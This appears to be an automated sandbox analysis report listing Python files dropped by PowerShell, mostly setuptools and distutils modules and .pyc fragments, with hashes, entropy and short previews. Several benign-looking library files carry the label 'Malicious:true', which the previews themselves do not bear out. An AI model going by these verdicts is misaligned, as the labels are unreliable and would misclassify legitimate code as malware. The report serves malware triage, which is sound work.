                                                                                                                                                                                                                              Preview:"""distutils.util..Miscellaneous utility functions -- anything that doesn't fit into.one of the other *util.py modules.."""..import functools.import importlib.util.import os.import re.import string.import subprocess.import sys.import sysconfig..from ._log import log.from ._modified import newer.from .errors import DistutilsByteCompileError, DistutilsPlatformError.from .spawn import spawn...def get_host_platform():. """. Return a string that identifies the current platform. Use this. function to distinguish platform-specific build directories and. platform-specific built distributions.. """.. # This function initially exposed platforms as defined in Python 3.9. # even with older Python versions when distutils was split out.. # Now it delegates to stdlib sysconfig, but maintains compatibility... if sys.version_info < (3, 9):. if os.name == "posix" and hasattr(os, 'uname'):. osname, host, release, version, machine = os.uname(). if os
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12648
                                                                                                                                                                                                                              Entropy (8bit):4.477445437247747
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sJU2OqJb6IzmJJBZRTkXW5xztvaiXGFUM1xDERenuaL+dy2y+JMJie+XWKV:sJN0Iz+JBZRZGUAxDERACc+JMJie+XWq
                                                                                                                                                                                                                              MD5:45F07415CF0B48D018768D0501AFE0E3
                                                                                                                                                                                                                              SHA1:CC12D9F2823ED3117725661ABC39741D5706FCA2
                                                                                                                                                                                                                              SHA-256:B5215886E2A3C689B990E34D07780E4CD7F9D9B391AB399437AE0BC454F94285
                                                                                                                                                                                                                              SHA-512:BA7D973C401CD5CBAE667634D997908FE72E906EDD35E24B7781478CF82BAE873EF836EF873316708FD8D1F0EAFBB39C7A2491FB0BDD574391895C37BB66B019
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:#.# distutils/version.py.#.# Implements multiple version numbering conventions for the.# Python Module Distribution Utilities..#.# $Id$.#.."""Provides classes to represent module version numbers (one class for.each style of version numbering). There are currently two such classes.implemented: StrictVersion and LooseVersion...Every version number class implements the following interface:. * the 'parse' method takes a string and parses it to some internal. representation; if the string is an invalid version number,. 'parse' raises a ValueError exception. * the class constructor takes an optional string argument which,. if supplied, is passed to 'parse'. * __str__ reconstructs the string that was passed to 'parse' (or. an equivalent string -- ie. one that will generate an equivalent. version number instance). * __repr__ generates Python code to recreate the version number instance. * _cmp compares the current instance with either another instance. of the same class
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5205
                                                                                                                                                                                                                              Entropy (8bit):4.725377046977409
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:4mu3rSTC2l0gA2XIjygw/Bk38/GKrflyYdPchZC59qPkt:LMee2lzEFwp//5cYdAPkt
                                                                                                                                                                                                                              MD5:99F14D70C582E52325942B5371802C08
                                                                                                                                                                                                                              SHA1:BE66F1604FECC95B8036944D2675F01A57A26D6D
                                                                                                                                                                                                                              SHA-256:B9BDEA574226C33551F887BEB3D3AD37A410F87BC350FC217EC8895873C053B5
                                                                                                                                                                                                                              SHA-512:2DCA35E19C63A24A1E8C5FB40E62FC52571CCA9281EC8D24FA18A81D4C675C4C5EB531FE56EC14A071802E8A82DA8AAA8B1367FE49D63FE6E99BD139743E90F8
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""Module for parsing and testing package version predicate strings."""..import operator.import re..from . import version..re_validPackage = re.compile(r"(?i)^\s*([a-z_]\w*(?:\.[a-z_]\w*)*)(.*)", re.ASCII).# (package) (rest)..re_paren = re.compile(r"^\s*\((.*)\)\s*$") # (list) inside of parentheses.re_splitComparison = re.compile(r"^\s*(<=|>=|<|>|!=|==)\s*([^\s,]+)\s*$").# (comp) (version)...def splitUp(pred):. """Parse a single version comparison... Return (comparison string, StrictVersion). """. res = re_splitComparison.match(pred). if not res:. raise ValueError("bad package restriction syntax: %r" % pred). comp, verStr = res.groups(). with version.suppress_known_deprecation():. other = version.StrictVersion(verStr). return (comp, other)...compmap = {. "<": operator.lt,. "<=": operator.le,. "==": operator.eq,. ">": operator.gt,. ">=": operator.ge,. "!=": operator.ne,.}...class VersionPredicate:. """Parse and test package ver
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6573
                                                                                                                                                                                                                              Entropy (8bit):4.49939586901454
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:VBxm8p0QZiMZiRQZiMZi9i5etYssRJdibVSIJmdLHSq0TUlR7L:b0pQZiMZiRQZiMZi95tYYoFlNL
                                                                                                                                                                                                                              MD5:3AA08DF51F42638AFA503D9AF502FE7D
                                                                                                                                                                                                                              SHA1:B639F5651FBE0AFF2F338F5E984580E3B51CF214
                                                                                                                                                                                                                              SHA-256:98EC93617988C2AE5F13AD5EB5B8FD4260F6BAEDE23C37ED04AA7D73539AB96D
                                                                                                                                                                                                                              SHA-512:FD11DB9C2AA021270EB564E9C480AD8DFD085F80955FF3242A021C3D567432107E2154973F59002CAA5E637CE9E9750A55BA36732B42DDCE39625D426DEEA2C7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""distutils.zosccompiler..Contains the selection of the c & c++ compilers on z/OS. There are several.different c compilers on z/OS, all of them are optional, so the correct.one needs to be chosen based on the users input. This is compatible with.the following compilers:..IBM C/C++ For Open Enterprise Languages on z/OS 2.0.IBM Open XL C/C++ 1.1 for z/OS.IBM XL C/C++ V2.4.1 for z/OS 2.4 and 2.5.IBM z/OS XL C/C++."""..import os..from . import sysconfig.from .errors import CompileError, DistutilsExecError.from .unixccompiler import UnixCCompiler.._cc_args = {. 'ibm-openxl': [. '-m64',. '-fvisibility=default',. '-fzos-le-char-mode=ascii',. '-fno-short-enums',. ],. 'ibm-xlclang': [. '-q64',. '-qexportall',. '-qascii',. '-qstrict',. '-qnocsect',. '-Wa,asa,goff',. '-Wa,xplink',. '-qgonumber',. '-qenum=int',. '-Wc,DLL',. ],. 'ibm-xlc': [. '-q64',. '-qexportall',.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2333
                                                                                                                                                                                                                              Entropy (8bit):4.692985679183794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:+CNAQv1YIclI4J4SNYCqBYqgzkUICN6IbMraJeHVvlJwE7HhHhjlFUV/3VDbJ:+p9J4SNYCLzk4N1MOJe1vZ1Bjlw/3VDV
                                                                                                                                                                                                                              MD5:344C282E9F84CA6FDF43A3F5A9373B3E
                                                                                                                                                                                                                              SHA1:4C8DB24510CE8F084898799F5A61052ED4AABBD7
                                                                                                                                                                                                                              SHA-256:5905332669AEFD5C2219E4854513D82FB0E67F49D78ED6EFFEA5A9DFDED1A26A
                                                                                                                                                                                                                              SHA-512:72665FEF1998AB0B44394931A89DE3F3182019E947AAF0309FFD53E4D15B59A49ECEED88C211010256E03AE3591D60DBA8BD14D2D033F7ECB99A8947CD6E0CE1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import functools.import operator.import itertools..from .errors import OptionError.from .extern.jaraco.text import yield_lines.from .extern.jaraco.functools import pass_none.from ._importlib import metadata.from ._itertools import ensure_unique.from .extern.more_itertools import consume...def ensure_valid(ep):. """. Exercise one of the dynamic properties to trigger. the pattern match.. """. try:. ep.extras. except (AttributeError, AssertionError) as ex:. # Why both? See https://github.com/python/importlib_metadata/issues/488. msg = (. f"Problems to parse {ep}.\nPlease ensure entry-point follows the spec: ". "https://packaging.python.org/en/latest/specifications/entry-points/". ). raise OptionError(msg) from ex...def load_group(value, group):. """. Given a value of an entry point or series of entry points,. return each as an EntryPoint.. """. # normalize to a single sequence of lines. lines = yi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2443
                                                                                                                                                                                                                              Entropy (8bit):4.729436106293066
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:S8XvUjy91plc1v5LNP44QweRF7pNRa5yN8Si1m8nZodTIOjFq8jn:zXvSuplQc0eRTN1N8Q8nZodTIcFqen
                                                                                                                                                                                                                              MD5:A95084AC80C96766386F9A984DBCA676
                                                                                                                                                                                                                              SHA1:025E37C9413FEAF4413186D075B9FE70A75E6F18
                                                                                                                                                                                                                              SHA-256:6ACF4B9E397B7191D20F6484D5286248E2BD90FEE8CB4301A6CFCC0FCDF6B05C
                                                                                                                                                                                                                              SHA-512:1649D9626F2D5A2BAF23931C4EDAE23A957109458871C5C765D5AD70B112EEE1956216369A9009250D72874F4360520BC139D21D2BF8615CD8A4C4E30D8B9C89
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".Re-implementation of find_module and get_frozen_object.from the deprecated imp module.."""..import os.import importlib.util.import importlib.machinery.import tokenize..from importlib.util import module_from_spec...PY_SOURCE = 1.PY_COMPILED = 2.C_EXTENSION = 3.C_BUILTIN = 6.PY_FROZEN = 7...def find_spec(module, paths):. finder = (. importlib.machinery.PathFinder().find_spec. if isinstance(paths, list). else importlib.util.find_spec. ). return finder(module, paths)...def find_module(module, paths=None):. """Just like 'imp.find_module()', but with package support""". spec = find_spec(module, paths). if spec is None:. raise ImportError("Can't find %s" % module). if not spec.has_location and hasattr(spec, 'submodule_search_locations'):. spec = importlib.util.spec_from_loader('__init__.py', spec.loader).. kind = -1. file = None. static = isinstance(spec.loader, type). if (. spec.origin == 'frozen'. or stati
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1468
                                                                                                                                                                                                                              Entropy (8bit):4.433903683484656
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:kp6wS1APS/2oGw8Ram0L77Io0wa8LrpyZrwMXXPh7XFWwPa6wS1aPUjAfVd:kp6DYS84m0LpCvVX4ItrqCAfVd
                                                                                                                                                                                                                              MD5:9E95718572E8BAE37F4F9A5276CF3D9C
                                                                                                                                                                                                                              SHA1:83409A521FE629E7B9926C01140AB6A73556BD21
                                                                                                                                                                                                                              SHA-256:6569586C61E36FE4304691F7490F6EBB19FF5FE1768A1710092E47B53FD6F659
                                                                                                                                                                                                                              SHA-512:E2547340DE4644046636F240E8C39DF1FC110C9357B691FF0E4296FB58ACE2E8107A826C3C4ABD7FE076D7B918A119BEBD61FE506B87F1A22A5629B391C7AED1
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import sys...def disable_importlib_metadata_finder(metadata):. """. Ensure importlib_metadata doesn't provide older, incompatible. Distributions... Workaround for #3102.. """. try:. import importlib_metadata. except ImportError:. return. except AttributeError:. from .warnings import SetuptoolsWarning.. SetuptoolsWarning.emit(. "Incompatibility problem.",. """. `importlib-metadata` version is incompatible with `setuptools`.. This problem is likely to be solved by installing an updated version of. `importlib-metadata`.. """,. see_url="https://github.com/python/importlib_metadata/issues/396",. ) # Ensure a descriptive message is shown.. raise # This exception can be suppressed by _distutils_hack.. if importlib_metadata is metadata:. return. to_remove = [. ob. for ob in sys.meta_path. if isinstance(ob, importlib_m
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):675
                                                                                                                                                                                                                              Entropy (8bit):4.469488427961897
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1iG0QUjsau/QGLv7I5p+FNav6QPMaXkg6QwNLJKld0Q7xrcA7AB+1fuA:1qzjsXQS75N66Q0aXL6QwNLJKld0QNY4
                                                                                                                                                                                                                              MD5:1CEA9EA20099C32BB455FDA521D8475B
                                                                                                                                                                                                                              SHA1:6DCDF31FF0151DE9583A1DB6EA913F41FC8D7776
                                                                                                                                                                                                                              SHA-256:A590205CDCFAB513D41671C068A27DD310200F480B3DE99C135DFDE99833EF7A
                                                                                                                                                                                                                              SHA-512:413A02A83A7F1E41EF285E1E98487ECEAC6C3C35090074F6701C5288DA24CC22E32F1603717B8221AEFDC4D577998E5A346282E300D2A73E59672076AB3E0122
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from setuptools.extern.more_itertools import consume # noqa: F401...# copied from jaraco.itertools 6.1.def ensure_unique(iterable, key=lambda x: x):. """. Wrap an iterable to raise a ValueError if non-unique values are encountered... >>> list(ensure_unique('abc')). ['a', 'b', 'c']. >>> consume(ensure_unique('abca')). Traceback (most recent call last):. .... ValueError: Duplicate element 'a' encountered.. """. seen = set(). seen_add = seen.add. for element in iterable:. k = key(element). if k in seen:. raise ValueError(f"Duplicate element {element!r} encountered."). seen_add(k). yield element.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4567
                                                                                                                                                                                                                              Entropy (8bit):5.0531354869372835
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dTVQ0ExODhnRv5oENUz1vN4vipGhNgNcHbHER5mdpCGs:7nRy1o26eR4dpCGs
                                                                                                                                                                                                                              MD5:32253C07CECDDB8AE3F70E12D44321E2
                                                                                                                                                                                                                              SHA1:2439C09D0F40CE9BDB08918BE74C85C6D666A968
                                                                                                                                                                                                                              SHA-256:B4719795020F4C3929E8FC5EE1A2A3445C06D0A3A34B886DB5F1CCDA1CE42C44
                                                                                                                                                                                                                              SHA-512:7ADA19DDFB7EE4B7EAA85F6BEE3CA6BB792EC5ACE32770034D126DD9C6F0E25E595A3E7C6EF6FB06DD21B390FDC3D683FBFA448DF22823A27FEDCB1F6D47C698
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".Helpers for normalization as expected in wheel/sdist/module file names.and core metadata."""..import re..from .extern import packaging..# https://packaging.python.org/en/latest/specifications/core-metadata/#name._VALID_NAME = re.compile(r"^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$", re.I)._UNSAFE_NAME_CHARS = re.compile(r"[^A-Z0-9._-]+", re.I)._NON_ALPHANUMERIC = re.compile(r"[^A-Z0-9]+", re.I)._PEP440_FALLBACK = re.compile(r"^v?(?P<safe>(?:[0-9]+!)?[0-9]+(?:\.[0-9]+)*)", re.I)...def safe_identifier(name: str) -> str:. """Make a string safe to be used as Python identifier.. >>> safe_identifier("12abc"). '_12abc'. >>> safe_identifier("__editable__.myns.pkg-78.9.3_local"). '__editable___myns_pkg_78_9_3_local'. """. safe = re.sub(r'\W|^(?=\d)', '_', name). assert safe.isidentifier(). return safe...def safe_name(component: str) -> str:. """Escape a component used as a project name according to Core Metadata.. >>> safe_name("hello world"). 'hello-world
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1178
                                                                                                                                                                                                                              Entropy (8bit):4.774223783144738
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:ZJhulRO4tUnWl2pXz5HFHwHi/HEM40O4i8cUE5ghW3:ZHW02USeXi0E8cUE5ghW3
                                                                                                                                                                                                                              MD5:95C494281CC23B48BEE4D695E78CA6F7
                                                                                                                                                                                                                              SHA1:4E9D9229F73C2E7357595D71E3D9482A3ADB1D99
                                                                                                                                                                                                                              SHA-256:F6DB7A1859CD8053C33086EEA44624F0488E5FD9365A3F61A5D90AEA46F51DE6
                                                                                                                                                                                                                              SHA-512:B6451F5EBC8869129446D6EA17CB04B7717B268448AF35F3C2814D5C1305A357A9B92A142941BC2CF24D6E5AECDF4270FFAB667254EEABDA62B074CF5754B29A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import os.import sys.from typing import Union..if sys.version_info >= (3, 9):. StrPath = Union[str, os.PathLike[str]] # Same as _typeshed.StrPath.else:. StrPath = Union[str, os.PathLike]...def ensure_directory(path):. """Ensure that the parent directory of `path` exists""". dirname = os.path.dirname(path). os.makedirs(dirname, exist_ok=True)...def same_path(p1: StrPath, p2: StrPath) -> bool:. """Differs from os.path.samefile because it does not require paths to exist.. Purely string based (no comparison between i-nodes).. >>> same_path("a/b", "./a/b"). True. >>> same_path("a/b", "a/./b"). True. >>> same_path("a/b", "././a/b"). True. >>> same_path("a/b", "./a/b/c/.."). True. >>> same_path("a/b", "../a/b/c"). False. >>> same_path("a", "a/b"). False. """. return normpath(p1) == normpath(p2)...def normpath(filename: StrPath) -> str:. """Normalize a file/dir name for comparison purposes.""". # See pkg_resources.normalize
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):4.773813268394923
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1UmQkoqLQbTOO7GkByx7jG1CDC4KXFCXlipjG0aETgG5XlqwpNhxT:GmPybiO3Ejk4o41ipjD5kBy5
                                                                                                                                                                                                                              MD5:91E7F8A153FDAB41C675CE77066D4E2D
                                                                                                                                                                                                                              SHA1:0C7B8EE89BF8C470A8A2E3887593F011B85C1392
                                                                                                                                                                                                                              SHA-256:8548CFF0C87A0FA05B2C486515AD3392C74B9CB176B4CC6014FB9048902911DE
                                                                                                                                                                                                                              SHA-512:8E281DA039DA14B4C32EDBBC3D5B0F0C5C9BA1F12003D1AD60F20E70F3847CE07B7816FEDC84AF0A4CA470C7E1793FFE716A810BC7352E8F6AE3D5E88FAE32E5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from functools import lru_cache.from typing import Callable, Iterable, Iterator, TypeVar, Union, overload..import setuptools.extern.jaraco.text as text.from setuptools.extern.packaging.requirements import Requirement.._T = TypeVar("_T")._StrOrIter = Union[str, Iterable[str]]...parse_req: Callable[[str], Requirement] = lru_cache()(Requirement).# Setuptools parses the same requirement many times.# (e.g. first for validation than for normalisation),.# so it might be worth to cache....def parse_strings(strs: _StrOrIter) -> Iterator[str]:. """. Yield requirement strings for each specification in `strs`... `strs` must be a string, or a (possibly-nested) iterable thereof.. """. return text.join_continuation(map(text.drop_comment, text.yield_lines(strs)))...@overload.def parse(strs: _StrOrIter) -> Iterator[Requirement]: ......@overload.def parse(strs: _StrOrIter, parser: Callable[[str], _T]) -> Iterator[_T]: ......def parse(strs, parser=parse_req):. """. Replacement for ``
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):173
                                                                                                                                                                                                                              Entropy (8bit):4.5573635636351195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:o1iclllVO8l4i5jAuFK5VcK85kdVWrzI0Q7RYKZ44RRwIaQHtgem/l:3cl/Vnei+uw52KNdAr8p7lZ44R6IaatC
                                                                                                                                                                                                                              MD5:FDDA56E268A40935E06290E12780CB23
                                                                                                                                                                                                                              SHA1:E0AA87D4487F8BD0A3D7A1E1BAC696A97EE65B0A
                                                                                                                                                                                                                              SHA-256:5AAE574CACFBB8A585181AA0EC79ADEDDC34A1E4A51E9A2CD4653ABB4103F8CE
                                                                                                                                                                                                                              SHA-512:6B6C9A48AD4687BF674828A6C263338EFB00C0CBD7A18C5D28AFD0B85BA3636AC40CEC8AD0999F2A1535A6A2C5411D8714E8DAFAD6AE4A4D6A2979B2FDADA9CC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................y.).N..r..........LC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19515
                                                                                                                                                                                                                              Entropy (8bit):5.231103036825998
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:32MC3lXWSJXms8WwjZbamzM5Kgk1BOwiFJ4DZclxzXUebCcVRNE6y7TIu/:2ljXbwloK64msebCcVRNE6y7TIu/
                                                                                                                                                                                                                              MD5:03CAAF636A57A68DC8BE6806BCE8DA24
                                                                                                                                                                                                                              SHA1:454170782580EA2405ECEF3EAA5B15E24A25065F
                                                                                                                                                                                                                              SHA-256:DFB6BEB1871CBE350E1BB7911F3D91928BF1C6B031878CFDE30DE7B810DD5982
                                                                                                                                                                                                                              SHA-512:AEABD55B55031007F54349FAAC232AF150382EDA03D4D0CFF32B8AD06E53C8BC8D5A22E3267BA750D6CEE3047ADED29E9B79D2151969776012935135C16C28CB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf.;.............................d.Z.d.d.l.Z.d.d.l.m.Z.....d.d.l.m.Z.m.Z.....e.d.........Z.d.Z.d...Z...G.d...d.e.e.........Z.y.#.e.$.r...d.d.l.m.Z.m.Z...Y..)w.x.Y.w.).z..An OrderedSet is a custom MutableSet that remembers its order, so that every.entry has an index that can be looked up...Based on a recipe originally posted to ActiveState Recipes by Raymond Hettiger,.and released under the MIT license.......N)...deque)...MutableSet..Sequencez.3.1c.....................f.....t.........|.d.........x.r$..t.........|.t...................x.r...t.........|.t...................S.).a..... Are we being asked to look up a list of things, instead of a single thing?. We check for the `__iter__` attribute so that this can cover types that. don't have to be known by this module, such as NumPy arrays... Strings, however, should be considered as atomic values to look up, not. iterables. The same goes for tuples, since they are immutable and therefore. valid entries... We
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14853
                                                                                                                                                                                                                              Entropy (8bit):5.062247863741483
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:6GkcYOqeqnxQoz7yp3OJO0h9hfcC599vKpW6xPj6C8x9Z39Pk:6G3YOqeExQozS3OJr5cs99Cg6Bj6C8xy
                                                                                                                                                                                                                              MD5:E2BB974A39CF9B29DDCF665F5ADF6A56
                                                                                                                                                                                                                              SHA1:75CB817467029CCB7A769E5123D93B891146C890
                                                                                                                                                                                                                              SHA-256:BB76B765E0708F29AD415D26493F9EA31C60F327D6C6BE6512B1CB167E2B0C48
                                                                                                                                                                                                                              SHA-512:7A715DAFF418B5B294FCB7820A1B8AC198EDCD3B275E2B1591F8CC1EB38555B68C8124ED01FE6C19F1B0BC77ABDE04C0FA67A8E801F5D597495A570D731E4A92
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf. ..............................d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...................d.k...r.d.d.l.m.Z...n.e.Z.d.g.Z.d...Z.d...Z.e.j...................Z...d...Z...G.d...d.e.j"..........................Z...G.d...d.e.........Z.d...Z...G.d...d.........Z.y.)......N)...........)...OrderedDict..Pathc.....................B.....t.........j...................t.........|.........d.d.........S.).a2.... Given a path with elements separated by. posixpath.sep, generate all parents of that path... >>> list(_parents('b/d')). ['b']. >>> list(_parents('/b/d/')). ['/b']. >>> list(_parents('b/d/f/')). ['b/d', 'b']. >>> list(_parents('b')). []. >>> list(_parents('')). []. .....N)...itertools..islice.._ancestry....paths.... .HC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/zipp.py.._parentsr........s....... ..........I.d.O.Q....5..5.....c................#........K.....|.j...................t.........j...............
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):183
                                                                                                                                                                                                                              Entropy (8bit):4.609870401823509
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:o1iclllVO8l4EuWAuFK5VcK85kdVWrzI0Q7RYKZvgKPRwIaQHtgem/l:3cl/VneE+uw52KNdAr8p7lZ4i6Iaatgz
                                                                                                                                                                                                                              MD5:D59AAD86995FB23976B0576119A77EFC
                                                                                                                                                                                                                              SHA1:62F563FDDF87165B27E0A3A2FFE70BEFF97149AB
                                                                                                                                                                                                                              SHA-256:5E5E5BACA17840BD3B26F3CB43E1E2B503580EA6742929BC81DFBB5122D58897
                                                                                                                                                                                                                              SHA-512:39F3EC1D184BD8A47E7292D34723518BDECFA56F949FE7ADA7D0D541F60F53F5641F8AF9A9069923BD741BECCC60C269DD1B263420E3F4FA78D107AB15F8713C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................y.).N..r..........VC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/_vendor/backports/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):119431
                                                                                                                                                                                                                              Entropy (8bit):5.205597870524033
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:4DPqJwPjFfRrQJM2jf8C6R8fC9YhjDG0Oo9IR+1grWgEkQ9MtF5xI4LqxeOc73:elQ1a4GJoI+OrJTd5Oc7
                                                                                                                                                                                                                              MD5:DFCBBA41B3381D75332777DF7703D9CB
                                                                                                                                                                                                                              SHA1:7E59CB6E95091F2EBA24ED10913EBEC533645472
                                                                                                                                                                                                                              SHA-256:629A6A0FE7BA56CE1CE3FA5813A636F47E84320829D2ECD54463052EA28499ED
                                                                                                                                                                                                                              SHA-512:7EA01C423C5F0274EE1570E0C33AC5D5C80131B643ED1BAA8F61C3FC3E5CAC4A921D166607452BB13A0463CBD780B43695B3CD4B68182CD7C7ED2002C6CCEEC2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf...............................d.Z.d.Z.d.Z.d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z...d.d.l.Z.e.e.e.f.Z.g.d...Z.d.Z.d.Z.e.d.z...Z.d.Z.d.Z.d.Z.d.Z.d.Z d.Z!d.Z"d.Z#d.Z$d.Z%d.Z&d.Z'd.Z(d.Z)d.Z*d.Z+d.Z,d.Z-d.Z.d.Z/d.Z0d.Z1d.Z2e2Z3e!e"e#e$e'e(e)e%e&e*e+e,f.Z4e!e"e)e,f.Z5e*e+e,f.Z6d.Z7h.d ..Z8e9e9e9e:e:e:d!..Z;e.jx..................d"k(..r.d#Z=n...e.j|..........................Z=d$..Z?d%..Z@d&..ZAd'e3f.d(..ZBd)..ZCd.e.d.f.d*..ZDd+..ZE..G.d,..d-eF........ZG..G.d...d/eG........ZH..G.d0..d1eG........ZI..G.d2..d3eG........ZJ..G.d4..d5eG........ZK..G.d6..d7eG........ZL..G.d8..d9eL........ZM..G.d:..d;eL........ZN..G.d<..d=eL........ZO..G.d>..d?eL........ZP..G.d@..dAeL........ZQ..G.dB..dC........ZR..G.dD..dE........ZS..G.dF..dGeT........ZU..G.dH..dIeT........ZV..G.dJ..dKe.j...........................ZX..G.dL..dMeG........ZY..G.dN..dOeY........ZZ..G.dP..dQeY........Z[..G.dR..dSeY........Z\..G.dT..dUeY........Z]..G.dV..dWeY
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):106920
                                                                                                                                                                                                                              Entropy (8bit):4.429712969972871
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:hkpnFKxjW5HjjAK6v7zjOlcYhJMUwxjlDC:hkpKj6HYK6v74hJMUEj5C
                                                                                                                                                                                                                              MD5:26426C008ED5FFE3C98721AF7E134778
                                                                                                                                                                                                                              SHA1:B17ACC5E0DB423BED151FDE3CDF9C4DD5358045F
                                                                                                                                                                                                                              SHA-256:20EDD85FF658AA7D7754E8BEDD02CCD259E4B67D74D94E1DF7052B1DCDB7D0B6
